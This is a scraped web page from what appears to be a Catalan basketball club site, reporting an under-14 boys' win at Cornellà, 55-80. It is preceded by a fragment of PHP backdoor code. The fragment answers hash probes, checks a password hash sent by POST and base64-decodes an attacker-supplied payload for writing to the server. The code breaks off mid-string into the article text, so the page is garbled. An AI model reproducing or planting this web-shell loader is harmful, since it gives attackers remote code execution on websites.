function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Victòria important de l'Infantil 10A masculí a Cornellà (55-80) - Tgn Bàsquet Club -

Victòria important de l’Infantil 10A masculí a Cornellà (55-80)

Updated: novembre 16, 2023

Gran partit de l’Infantil Masculí 10A contra un rival directe de la part alta de la classificació com és el Cornellà, que només havia perdut 1 partit fins al nostre enfrontament. El matx es va iniciar amb força igualtat encara que amb lleugers avantatges de l’equip local. A poc a poc vam començar a imposar el nostre ritme, i a partir del 2n quart la nostra pressió defensiva va començar a funcionar, cosa que provocava ràpids contraatacs amb què vam començar a treure avantatge al marcador.

Després del descans el Cornellà va intentar neutralitzar la diferència i va tenir moments en què van enllaçar diverses cistelles seguides, però els nostres nois no es van posar nerviosos i van continuar jugant els moviments que vam treballar des del principi de temporada, traient gairebé sempre bones accions que acabaven en assistències algun company.

A l’últim quart, vam pujar una mica més el ritme, alhora que el Cornellà acabava de desinflar-se, i seguim augmentant el nostre avantatge fins al final del partit. Sens dubte ha estat el nostre partit més complet, i hem tornat a aconseguir més assistències (22) que pilotes perdudes (17).

CB CORNELLÀ 55 – 80 TGN Bàsquet 10A

PARCIALS: 15-11 / 11-26 / 19-17 / 10-26